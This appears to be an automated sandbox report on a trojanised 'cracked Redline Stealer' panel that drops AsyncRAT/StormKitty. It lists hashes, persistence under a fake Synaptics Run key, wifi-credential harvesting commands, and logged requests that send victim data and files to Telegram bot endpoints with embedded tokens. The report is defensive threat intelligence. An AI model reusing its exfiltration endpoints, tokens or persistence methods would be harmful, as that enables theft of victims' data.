asyncrat | f414e4465043ddc7e7d558b341d2fefaf62a379d8107c7bc7b39a3d3f4c55b56

Analysis

max time kernel
146s
max time network
129s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
24/04/2023, 15:39 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Redline Stealer v24.2 cracked [XT_CH]/Panel/RedLine_24_2/Panel/Panel 24.2.exe
Size

923KB
MD5

ad5e1454eb96c012755dcab90cfd69cf
SHA1

17f93458b223542eed1c269d9c64b8c39341b1cd
SHA256

726725262283f68ec3e3f62d13863c7df9b08f54e19c28603407d98631468494
SHA512

1f503e6619ff5cd87838b4618400ae54c24d5f618813cfd8ce7ecdd53f25d74186dda096a1a2ab49848184e22137c05de0fbf010a0ccc9adcc5b58e727da1d46
SSDEEP

12288:0MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Z0N6qsUwXPDgj:0nsJ39LyjbJkQFMhmC+6GD9UaE

Score

10^/10

asyncrat stormkitty default persistence rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendMessage?chat_id=5529838804

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

1
6C1g1bqh7ipnURt3i010tOdFBOuLNa2n

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 12 IoCs

resource	yara_rule
behavioral19/files/0x000500000001a511-124.dat	family_stormkitty
behavioral19/files/0x000500000001a511-172.dat	family_stormkitty
behavioral19/files/0x000500000001a511-177.dat	family_stormkitty
behavioral19/files/0x000800000001ae9b-179.dat	family_stormkitty
behavioral19/files/0x000800000001ae9b-233.dat	family_stormkitty
behavioral19/files/0x000800000001ae9b-235.dat	family_stormkitty
behavioral19/memory/2080-236-0x0000000000740000-0x0000000000770000-memory.dmp	family_stormkitty
behavioral19/memory/3980-234-0x0000000000400000-0x00000000004ED000-memory.dmp	family_stormkitty
behavioral19/files/0x000700000001aedd-291.dat	family_stormkitty
behavioral19/files/0x000700000001aedd-292.dat	family_stormkitty
behavioral19/memory/3168-383-0x0000000000400000-0x00000000004ED000-memory.dmp	family_stormkitty
behavioral19/memory/3168-483-0x0000000000400000-0x00000000004ED000-memory.dmp	family_stormkitty

Async RAT payload 13 IoCs

rat

resource	yara_rule
behavioral19/files/0x000500000001a511-124.dat	asyncrat
behavioral19/files/0x000500000001a511-172.dat	asyncrat
behavioral19/files/0x000500000001a511-177.dat	asyncrat
behavioral19/files/0x000800000001ae9b-179.dat	asyncrat
behavioral19/files/0x000800000001ae9b-233.dat	asyncrat
behavioral19/files/0x000800000001ae9b-235.dat	asyncrat
behavioral19/memory/2080-236-0x0000000000740000-0x0000000000770000-memory.dmp	asyncrat
behavioral19/memory/3980-234-0x0000000000400000-0x00000000004ED000-memory.dmp	asyncrat
behavioral19/files/0x000700000001aedd-291.dat	asyncrat
behavioral19/files/0x000700000001aedd-292.dat	asyncrat
behavioral19/memory/3148-293-0x0000000004AF0000-0x0000000004B00000-memory.dmp	asyncrat
behavioral19/memory/3168-383-0x0000000000400000-0x00000000004ED000-memory.dmp	asyncrat
behavioral19/memory/3168-483-0x0000000000400000-0x00000000004ED000-memory.dmp	asyncrat

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Control Panel\International\Geo\Nation	Panel 24.2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Control Panel\International\Geo\Nation	Synaptics.exe

Executes dropped EXE 3 IoCs

pid	Process
2080	._cache_Panel 24.2.exe
3168	Synaptics.exe
3148	._cache_Synaptics.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	Panel 24.2.exe

Drops desktop.ini file(s) 15 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	._cache_Panel 24.2.exe
File created	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	._cache_Panel 24.2.exe
File created	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	._cache_Panel 24.2.exe
File created	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	._cache_Panel 24.2.exe
File created	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	._cache_Panel 24.2.exe
File opened for modification	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	._cache_Synaptics.exe
File opened for modification	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	._cache_Synaptics.exe
File opened for modification	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	._cache_Panel 24.2.exe
File opened for modification	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	._cache_Synaptics.exe
File opened for modification	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	._cache_Synaptics.exe
File created	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	._cache_Panel 24.2.exe
File opened for modification	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	._cache_Synaptics.exe
File created	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	._cache_Panel 24.2.exe
File created	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	._cache_Synaptics.exe
File opened for modification	C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	._cache_Synaptics.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	icanhazip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1524	3148	WerFault.exe	68

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	._cache_Panel 24.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	._cache_Panel 24.2.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Synaptics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Panel 24.2.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe
2080	._cache_Panel 24.2.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2080	._cache_Panel 24.2.exe
Token: SeDebugPrivilege	3148	._cache_Synaptics.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 3980 wrote to memory of 2080	3980	Panel 24.2.exe	66
PID 3980 wrote to memory of 2080	3980	Panel 24.2.exe	66
PID 3980 wrote to memory of 2080	3980	Panel 24.2.exe	66
PID 3980 wrote to memory of 3168	3980	Panel 24.2.exe	67
PID 3980 wrote to memory of 3168	3980	Panel 24.2.exe	67
PID 3980 wrote to memory of 3168	3980	Panel 24.2.exe	67
PID 3168 wrote to memory of 3148	3168	Synaptics.exe	68
PID 3168 wrote to memory of 3148	3168	Synaptics.exe	68
PID 3168 wrote to memory of 3148	3168	Synaptics.exe	68
PID 2080 wrote to memory of 2236	2080	._cache_Panel 24.2.exe	72
PID 2080 wrote to memory of 2236	2080	._cache_Panel 24.2.exe	72
PID 2080 wrote to memory of 2236	2080	._cache_Panel 24.2.exe	72
PID 2236 wrote to memory of 2196	2236	cmd.exe	74
PID 2236 wrote to memory of 2196	2236	cmd.exe	74
PID 2236 wrote to memory of 2196	2236	cmd.exe	74
PID 2236 wrote to memory of 400	2236	cmd.exe	75
PID 2236 wrote to memory of 400	2236	cmd.exe	75
PID 2236 wrote to memory of 400	2236	cmd.exe	75
PID 2236 wrote to memory of 2556	2236	cmd.exe	76
PID 2236 wrote to memory of 2556	2236	cmd.exe	76
PID 2236 wrote to memory of 2556	2236	cmd.exe	76
PID 2080 wrote to memory of 2072	2080	._cache_Panel 24.2.exe	77
PID 2080 wrote to memory of 2072	2080	._cache_Panel 24.2.exe	77
PID 2080 wrote to memory of 2072	2080	._cache_Panel 24.2.exe	77
PID 2072 wrote to memory of 2672	2072	cmd.exe	79
PID 2072 wrote to memory of 2672	2072	cmd.exe	79
PID 2072 wrote to memory of 2672	2072	cmd.exe	79
PID 2072 wrote to memory of 2928	2072	cmd.exe	80
PID 2072 wrote to memory of 2928	2072	cmd.exe	80
PID 2072 wrote to memory of 2928	2072	cmd.exe	80

C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\Panel 24.2.exe
"C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\Panel 24.2.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3980
- C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Panel 24.2.exe
  "C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Panel 24.2.exe"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2236
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:2196
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      PID:400
  - - C:\Windows\SysWOW64\findstr.exe
      findstr All
      4⤵
      PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      PID:2928
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3168
- - C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - Drops desktop.ini file(s)
    - Suspicious use of AdjustPrivilegeToken
    PID:3148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1364
      4⤵
      Program crash
      PID:1524

Network

DNS

xred.mooo.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

xred.mooo.com

IN A

Response
DNS

freedns.afraid.org

Synaptics.exe

Remote address:

8.8.8.8:53

Request

freedns.afraid.org

IN A

Response

freedns.afraid.org

IN A

174.128.246.100
GET

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Synaptics.exe

Remote address:

174.128.246.100:80

Request

GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 24 Apr 2023 15:40:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
DNS

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

Remote address:

8.8.8.8:53

Request

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

IN PTR

Response
DNS

100.246.128.174.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.246.128.174.in-addr.arpa

IN PTR

Response
DNS

52.4.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.4.107.13.in-addr.arpa

IN PTR

Response
DNS

icanhazip.com

._cache_Panel 24.2.exe

Remote address:

8.8.8.8:53

Request

icanhazip.com

IN A

Response

icanhazip.com

IN A

104.18.114.97

icanhazip.com

IN A

104.18.115.97
GET

http://icanhazip.com/

._cache_Panel 24.2.exe

Remote address:

104.18.114.97:80

Request

GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 24 Apr 2023 15:40:50 GMT
Content-Type: text/plain
Content-Length: 13
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=EFcGFA0nATBU4Fo1A_GOvf_bKJiiB5tUpVgz1hUKCnA-1682350850-0-AWcxV+MOqCf8nq/4A8Zwl38b3NoKofExv3L+26cx1VoS/kBgfqOWC19s+gqS1fheNlIT17H2h/jQzdG2G64kSmU=; path=/; expires=Mon, 24-Apr-23 16:10:50 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 7bcf72709c281ca2-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
DNS

api.mylnikov.org

._cache_Panel 24.2.exe

Remote address:

8.8.8.8:53

Request

api.mylnikov.org

IN A

Response

api.mylnikov.org

IN A

172.67.196.114

api.mylnikov.org

IN A

104.21.44.66
GET

https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=1a:88:bb:2b:5e:be

._cache_Panel 24.2.exe

Remote address:

172.67.196.114:443

Request

GET /geolocation/wifi?v=1.1&bssid=1a:88:bb:2b:5e:be HTTP/1.1
Host: api.mylnikov.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 24 Apr 2023 15:40:51 GMT
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: MISS
Last-Modified: Mon, 24 Apr 2023 15:40:51 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sMPnGOM6SHb%2BJaeszhr0ajQdpofrNV%2Bq0AyOrUtK6N7DbQ%2B%2B6gKzwebSvK4FUna73v58zcu6scNGId76h17CLkF6EaF8JWME%2BdhYqhdx5QTfXk1ASlEHf9Nx8eKToK7%2Fuid0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 7bcf7274aae1b725-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
DNS

api.telegram.org

._cache_Panel 24.2.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendMessage?chat_id=5529838804&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-04-24%205:40:33%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20EIEEIFYE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20078BFBFF000306D2%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.21%0AExternal%20IP:%20154.61.71.13%0ABSSID:%201a:88:bb:2b:5e:be%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True

._cache_Panel 24.2.exe

Remote address:

149.154.167.220:443

Request

GET /bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendMessage?chat_id=5529838804&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-04-24%205:40:33%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20EIEEIFYE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20078BFBFF000306D2%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.21%0AExternal%20IP:%20154.61.71.13%0ABSSID:%201a:88:bb:2b:5e:be%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 24 Apr 2023 15:40:51 GMT
Content-Type: application/json
Content-Length: 1999
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendMessage?chat_id=5529838804&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

._cache_Panel 24.2.exe

Remote address:

149.154.167.220:443

Request

GET /bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendMessage?chat_id=5529838804&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 24 Apr 2023 15:40:51 GMT
Content-Type: application/json
Content-Length: 301
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
POST

https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendDocument?chat_id=5529838804

._cache_Panel 24.2.exe

Remote address:

149.154.167.220:443

Request

POST /bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendDocument?chat_id=5529838804 HTTP/1.1
Content-Type: multipart/form-data; boundary="c357b3d3-cbb4-4aea-9e6e-d138b85374d4"
Host: api.telegram.org
Content-Length: 81753
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 24 Apr 2023 15:40:52 GMT
Content-Type: application/json
Content-Length: 516
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

97.114.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.114.18.104.in-addr.arpa

IN PTR

Response
DNS

114.196.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

114.196.67.172.in-addr.arpa

IN PTR

Response
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
POST

https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866

._cache_Panel 24.2.exe

Remote address:

149.154.167.220:443

Request

POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1
Content-Type: multipart/form-data; boundary="277df77f-bc62-4c99-bf3c-fcd4140cc82b"
Host: api.telegram.org
Content-Length: 81753
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 24 Apr 2023 15:40:53 GMT
Content-Type: application/json
Content-Length: 523
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

233.141.123.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.141.123.20.in-addr.arpa

IN PTR

Response
DNS

docs.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.174
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.179.174:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 24 Apr 2023 15:41:33 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-RD9CqyzLUHEd1bs0YzZjzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.179.174:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 24 Apr 2023 15:41:33 GMT
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
